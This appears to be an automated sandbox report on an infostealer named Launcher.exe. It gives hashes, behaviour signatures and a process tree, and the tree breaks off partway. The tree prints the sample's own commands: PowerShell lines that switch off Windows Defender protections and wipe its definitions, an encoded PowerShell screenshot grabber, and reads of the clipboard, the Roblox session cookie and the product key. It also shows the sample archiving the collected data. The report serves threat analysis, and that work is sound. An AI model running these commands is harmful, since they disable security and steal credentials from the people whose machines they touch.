Analysis

  • max time kernel
    8s
  • max time network
    11s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    20-01-2025 21:07

General

  • Target

    Launcher.exe

  • Size

    5.9MB

  • MD5

    e632dad63d85e326f996d29455a73c5e

  • SHA1

    b2790f28c60841c2cfd9334dc2b3d35a68965e56

  • SHA256

    b3f3b2509384e16b578e69b3702074f91d76dd43dffc7f427072346d30900140

  • SHA512

    8e68cecd310c0a7a27076b2d6f53b9b578e641d46d554ebf5fca33baac2741d8a501cb2728cf7870dc7a42dac8a2077bf1103a3ef190efb880035aec8ba5247a

  • SSDEEP

    98304:+/De7pzfmyck8MMhJMjarCtaCObO/OH9KkqQz4W1kgeD2FMZi3+ML4eB:+SNzpqB6yA+KO0WRPiZkL4eB

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Launcher.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Launcher.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3036
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4072
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4012
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1204
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2520
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:644
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2228
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:1308
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3436
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:2500
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4576
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:2776
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4944
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2032
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3512
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:3160
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3004
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:1396
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              • Suspicious use of WriteProcessMemory
              PID:1388
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:3832
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:732
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4912
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4660
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:4236
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                3⤵
                  PID:3592
                  • C:\Windows\system32\reg.exe
                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                    4⤵
                      PID:3432
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:2432
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:2068
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                      3⤵
                        PID:4592
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3320
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u0vhmc3a\u0vhmc3a.cmdline"
                            5⤵
                              PID:220
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES953B.tmp" "c:\Users\Admin\AppData\Local\Temp\u0vhmc3a\CSCAC3DB69E6D2E4EAE88A2C348511D1099.TMP"
                                6⤵
                                  PID:4576
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:832
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:4756
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                3⤵
                                  PID:3444
                                  • C:\Windows\system32\attrib.exe
                                    attrib -r C:\Windows\System32\drivers\etc\hosts
                                    4⤵
                                    • Drops file in Drivers directory
                                    • Views/modifies file attributes
                                    PID:1684
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:2644
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3960
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:3188
                                        • C:\Windows\system32\attrib.exe
                                          attrib +r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:712
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:3380
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:4080
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                            3⤵
                                              PID:1876
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist /FO LIST
                                                4⤵
                                                • Enumerates processes with tasklist
                                                PID:1292
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:1308
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:3488
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:3052
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:4680
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                      3⤵
                                                        PID:3084
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                          4⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1288
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                        3⤵
                                                          PID:2312
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2764
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "getmac"
                                                          3⤵
                                                            PID:1532
                                                            • C:\Windows\system32\getmac.exe
                                                              getmac
                                                              4⤵
                                                                PID:1472
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI27082\rar.exe a -r -hp"90734242" "C:\Users\Admin\AppData\Local\Temp\ATGQ6.zip" *"
                                                              3⤵
                                                                PID:1880
                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI27082\rar.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\_MEI27082\rar.exe a -r -hp"90734242" "C:\Users\Admin\AppData\Local\Temp\ATGQ6.zip" *
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:4764
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                3⤵
                                                                  PID:956
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic os get Caption
                                                                    4⤵
                                                                      PID:4452
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                    3⤵
                                                                      PID:3848
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic computersystem get totalphysicalmemory
                                                                        4⤵
                                                                          PID:1012
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                        3⤵
                                                                          PID:1800
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic csproduct get uuid
                                                                            4⤵
                                                                              PID:2316
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                            3⤵
                                                                              PID:2716
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                4⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                PID:4232
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                              3⤵
                                                                                PID:1596
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic path win32_VideoController get name
                                                                                  4⤵
                                                                                  • Detects videocard installed
                                                                                  PID:4008
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                3⤵
                                                                                  PID:3060
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
